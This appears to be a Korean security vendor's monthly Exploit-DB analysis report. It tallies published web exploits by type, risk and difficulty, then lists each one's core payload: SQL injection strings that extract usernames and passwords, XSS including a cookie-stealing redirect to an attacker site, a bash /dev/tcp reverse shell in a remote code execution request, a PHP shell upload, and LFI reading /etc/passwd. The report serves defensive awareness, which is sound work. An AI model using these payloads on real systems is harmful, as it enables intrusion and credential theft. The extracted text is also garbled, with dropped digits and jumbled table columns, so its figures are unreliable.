EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한보고개수가가장많았으며공격유형도다양하게발견되었습니다. SQL Injection 공격은처음에는난이도가낮은공격이라도일단이발견되면해당을악용하여다양한공격을할수있는매우높은위험도를갖는공격에속합니다. SQL Injection 에노출되지않기위해서는입력값검증을엄격하게실시하는시큐어코딩이필수적으로요구되어집니다. 주요소프트웨어발생현황을보면, 0 월에는 CMS 부터 까지다양한소프트웨어에서이발견되었습니다. 이발견된소프트웨어를사용하는관리자는해당의내용을꼭확인하시고관련업데이트를실시하여에노출되지않도록주의하여야겠습니다.. 별보고개수 보고개수 Remote Command Execution File Upload LFI XSS SQL Injection 3 총합계 48 5 별보고개수 3 0 5 0 5 0 Remote Command ExecutionFile Upload LFI XSS SQL Injection. 위험도별분류위험도보고개수백분율 상 5 0.4% 중 43 89.58% 총합계 48 00.00% 위험도별분류 43 5 상 중 3. 공격난이도별현황 공격난이도 보고개수 백분율 상 4 8.33% 중 9 8.75% 하 35 7.9% 총합계 48 00.00% 공격난이도별현황 4 9 35 상 중 하 4. 주요소프트웨어별발생현황소프트웨어이름보고개수 Q3V 4 Image Business Rental Dynamic Web Picosafe Entrepreneur Job Portal Thatware Event Calendar Press Release Fashion School Full CBT FreePBX Application Health Record Witbe Ap MicroBlog Categorizator JonhCMS Rental Ap MicroCMS S9Y Serendipity CNDSOFT Learning Management Forum XhP CMS Student Information Advance MLM Web Based Alumni Tracking Syste OpenCimetiere Colorful Blog BB Portal miniblog MLM Unilevel Plan 총합계 48 주요소프트웨어별발생현황 4 Q3V Image Business Rental Dynamic Web Picosafe
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webinterface/js/filemanager/filemanage 06-0-05 40454 XSS 중 중 Picosafe Web Gui - r.php?directory=phnjcmlwdd5hbgvydcgxkts8l3njcmlwd Picosafe Web Picosafe filemanager.php XSS D4= Gui 06-0-06 40468 SQL Injection 하중 BB Portal - viewproduct.php SQL Injection /advancedbb/viewproduct.php?pid=94%7%0and%0754=754%0 AND%0%7whqn%7=%7whqn BB Portal BB Portal 06-0-06 40467 SQL Injection 하중 06-0-06 40466 SQL Injection 중중 Rental - Blind SQL Injection Advance MLM - SQL Injection /product_details.php?refid=395887%7%0and% 039=39%0AND%0%7HTMi%7=%7HTMi /mlm/news_detail.php?newid=jmctrq%7%0union% 0ALL%0SELECT%0NULL,CONCAT(0x7787a7a7,0x4 8755657878776796667664866474474844b655 564f54370537747504c6e73687666550,0x7787877 ),NULL,NULL,NULL,NULL--%0Afye Rental Advance MLM Rental Advance MLM 06-0-06 40470 SQL Injection 하중 06-0-06 40469 SQL Injection 상상 - /jus/restaurants-details.php?fid=%0and%0=-- restaurants-details.php SQL Injection /news_detail.php?newid=%7%0%f*%30000an MLM Unilevel Plan v.0. d%0ascii%8substring%8%8database%8%9%9 - news_detail.php SQL Injection %C4%C%9%9%3C5%0and*%F%0%7x %7%3D%7x Clone MLM Unilevel Plan MLM Unilevel Plan v.0. 06-0-06 4046 Remote Command Execution 중상 Witbe - Remote Code Execution POST /cgi-bin/applyconfig.pl HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Witbe Witbe file=set bash -i >& /dev/tcp/ 0>& 06-0-06 40470 XSS 하중 06-0-07 40479 SQL Injection 상상 - /jus/restaurants-details.php?fid=<script>alert();</script> restaurants-details.php XXS /job-portal/jobsearch_all.html?cmpid=345355536' AND (SELECT 8347 FROM(SELECT Entrepreneur Job Portal - COUNT(*),CONCAT(0x76a7a7a7,(SELECT jobsearch_all.html SQL Injection (ELT(8347=8347,))),0x77876b7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjf'='tqjf Clone Entrepreneur Job Portal Entrepreneur Job Portal 06-0-09 40480 XSS 중중 miniblog.0. - admin.php XSS POST /miniblog/adm/admin.php?mode=add&id=%3cbr%0/% 3E%3Cb%3ENotice%3C/b%3E:%0%0Undefined%0 variable:%0post%0in%0%3cb%3ec:\\\\xampp \\\\htdocs\\\\miniblog\\\\adm\\\\edit.p hp%3c/b%3e%0on%0line%0%3cb%3e8%3c/b% 3E%3Cbr%0/%3E HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 miniblog miniblog.0. data[post_title]=<script>location.href = â http://www.attackersite.com/stealer.php?cookie=â +document.cookie;</script> 06-0-09 40487 XSS 하중 Press Release - administration.php XSS /phppressrelease/administration.php?pageaction=saverele ase&subaction=submit&dateday=&datemonthnewedit=&d ateyearnewedit=&title=<script>alert('exploit- DB')<%Fscript>&summary=deneme&releasebody=denem e&categorynewedit=&publish=active Press Release Press Release 06-0- 40505 XSS 하중 Ap MicroBlog.0. - index.php XSS POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Ap MicroBlog Ap MicroBlog.0. task=publish_comment&article_id=69&user_id=&commen t_user_name=<script>alert(7);</script>&comment_user_e mail=besimweptest@yopmail.com&comment_text=besim& captcha_code=dkf8&btnsubmitpc=publish your comment
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 06-0- 4053 SQL Injection 하 중 OpenCimetiere v3.0.0-a5 - OpenCimetier OpenCimetier login.php SQL Injection e e v3.0.0-a5 login.action.connect=se%0connecter&came_from=&logi n=%0and%0=--&password=passw0rd 06-0- 4056 XSS 하중 Ap MicroCMS 3.9.5 - index.php XSS POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Ap MicroCMS Ap MicroCMS 3.9.5 comment_user_name=<svg/onload=prompt(7);//> 06-0- 405 SQL Injection 하중 Categorizator 0.3. - vote.php SQL Injection /cms/categorizator/vote.php?id_site='%0and%0''=' ' Categorizator Categorizator 0.3. 06-0-3 4056 XSS 하중 Colorful Blog - single.php XSS POST /single.php?kat=kat&url='post_name' HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Colorful Blog Colorful Blog adsoyad=<script>alert('document.cookie')</script>&email= besim@yopmail.com&web=example.com&mesaj=nice, blog post 06-0-3 4059 SQL Injection 하중 06-0-3 4058 XSS 하중.0 - /blog/admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection.0 - Multiple Vulnerabilities POST /blog/admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7.0.0 act= addpost&publish_date=06-0-3 0:30:7&post_title=<script>alert('XssPoC')</script>&post_ text=hacked&post_limit=550 06-0-3 40530 SQL Injection 하 중 06-0-3 405 SQL Injection 하 중 06-0-4 4053 SQL Injection 하 중 06-0-4 40547 SQL Injection 하 중 JonhCMS 4.5. - go.php SQL /go.php?id=%0and%0=-- Injection Thatware 0.4.6 - friend.php SQL /friend.php?sid=%0and%0=-- Injection Forum.4 - /admin.php?act=editpost&id='+order+by+999--+ admin.php SQL Injection POST /signin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Health Record 0. - Chrome/6.0.9.75 Safari/535.7 signin.php SQL Injection JonhCMS Thatware Forum Health Record JonhCMS 4.5. Thatware 0.4.6 Forum.4 Health Record 0. 06-0-4 40546 SQL Injection 중중 06-0-4 40545 SQL Injection 하중 Fashion 0. - dd.php SQL Injection Learning Management 0. - login.php SQL Injection lgaid=admin' or ''=' /admin/dd.php?q=- %7%0union%0select%0,version()--+ POST /admin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Fashion Fashion 0. Learning Management Learning Management 0. username=admin' or ''=' 06-0-4 40544 SQL Injection 중중 06-0-4 40543 SQL Injection 중중 Dynamic Web 0. - page.php SQL Injection Web Based Alumni Tracking 0. - print_employed.php SQL Injection /page.php?prodid=- 3%7%0union%0select%0,,@@version,4--+ /admin/print_employed.php?id=- %7%0union%0select%0,concat(username,0x3a,p assword),3,4,5,6,7,8,9,0,,%0from%0user--+ Dynamic Web Web Based Alumni Tracking Dynamic Web 0. Web Based Alumni Tracking 0.
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 06-0-4 4054 SQL Injection 하중 POST /admin_login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Student Information Chrome/6.0.9.75 Safari/535.7 (SIS) 0. - admin_login.php SQL Injection username=admin' or ''=' Student Information Student Information (SIS) 0. 06-0-6 4055 XSS 하 중 06-0-6 4055 XSS 하 중 06-0-7 40559 XSS 하 중 06-0-7 40558 SQL Injection 중 중 - index.php XSS - administration.php XSS Business - index.php XSS School Full CBT 0. - show.php SQL Injection /index.php?key=<svg/onload=alert()> /administration.php?key=<svg/onload=alert()> /index.php?key=<svg/onload=alert()>&location=<svg/onl oad=alert()> /show.php?show=- %0union%0select%0,username,password,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7, 8,user(),database(),3,3%0from%0adminlogin--+ Business School Full CBT Business School Full CBT 0. 06-0-7 40555 SQL Injection 상 상 06-0-7 40554 XSS 하 중 06-0-7 40554 XSS 하 중 06-0-7 40559 XSS 하 중 06-0-9 40576 XSS 중 중 /shop/product-details.php?prodid=- 80%7%0union%0select%0,,concat(username,0x Application 0. - productdetails.php SQL Injection 3a,password),4,version(),user()%0from%0user--+ Image - index.php XSS Image - administration.php XSS Business - administration.php XSS XhP CMS 0.5. - action.php XSS /index.php?dateyear=<svg/onload=alert()>&key=<svg/onl oad=alert()> /administration.php?dateyear=<svg/onload=alert()>&key= <svg/onload=alert()> /administration.php?key=<svg/onload=alert()>&location= <svg/onload=alert()> POST /action.php?module=users&action=process_general_confi g&box_id=9&page_id=0&basename=index.php&closewin dow=&from_page=page=0&box_id=9&action=display_sit e_settings&errcode=0 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Application Image Image Business XhP CMS Application 0. Image Image Business XhP CMS 0.5. frmpagetitle="accesskeyzonclick"alert&# 40;document.domain 06-0-9 40575 File Upload 하중 CNDSOFT.3 - index.php File Upload POST /ofis/index.php?is=kullanici_tanimla HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f CNDSOFT CNDSOFT.3 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream 06-0-0 40594 SQL Injection 하중 06-0-0 4059 SQL Injection 상상 <? phpinfo();?> -----------------------------7dd009908f-- /admin.php?act=options&cal_id='+order+by+0--+ Event Calendar.5 - admin.php SQL Injection Rental - viewproducts.php SQL Injection /viewproducts.php?catid=- 9700%7%0OR%0%0GROUP%0BY%0CONCAT (0x77a6707,(SELECT%0(CASE%0WHEN%0(7055 =7055)%0THEN%0%0ELSE%00%0END)),0x76a 76787,FLOOR(RAND(0)*))%0HAVING%0MIN(0)# Event Calendar Rental Event Calendar.5 Rental 06-0- 406 SQL Injection 하중 - categoryview-list.php SQL Injection 취약 /category-view-list.php?srch=%0and%0=-- 점 Clone
EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /admin/ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 06-0- 4064 LFI 하 중 FreePBX 0.3.66 - ajax.php LFI FreePBX FreePBX 0.3.66 destination=/../../../../../../var/www/html/0x448.php&lan guage= 06-0-3 4060 XSS 하중 07 - form_process.php XSS POST /zenbership/pp-functions/form_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 page=&session=zen_076e737b450bbd83f5fc066&first _name=besim&last_name=<>alert('exploitdb')</scrip t>&email=exploit@yopmail.com 06-0-3 4060 XSS 하중 07 - event-add.php XSS POST /admin/cp-functions/event-add.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 07 event[name]=<>alert('meryem-exploitdb');</> 06-0-8 4064 XSS 하중 Q3V - FWUpgrade.php XSS POST /FWUpgrade.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm()>" Content-Type: text/php Q3V Q3V t00t -----------------------------7dd009908f-- 06-0-8 4064 XSS 하중 06-0-8 4064 XSS 하중 Q3V - SensorDetails.php XSS Q3V - SNMP.php XSS /SensorDetails.php?Menu=SST&DeviceID=C00"><script>al ert()</script> POST /SNMP.php?Menu=SMP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Q3V Q3V Q3V Q3V SNMPAgent=Enable&CommuintyString=public&Commuint ywrite=private&trapsversion=vtrap&ip=9.68.0.54';a lert(3) 06-0-8 4064 LFI 하중 06-0-3 40650 XSS 하중 Q3V - ListFile.php LFI /ListFile.php?file=../../../../../../../etc/passwd POST /serendipity_admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 S9Y Serendipity.0.4 - Chrome/6.0.9.75 Safari/535.7 serendipity_admin.php XSS 취약 점 Q3V S9Y Serendipity Q3V S9Y Serendipity.0.4 serendipity[body]=<>alert('meryem ExploitDB')</>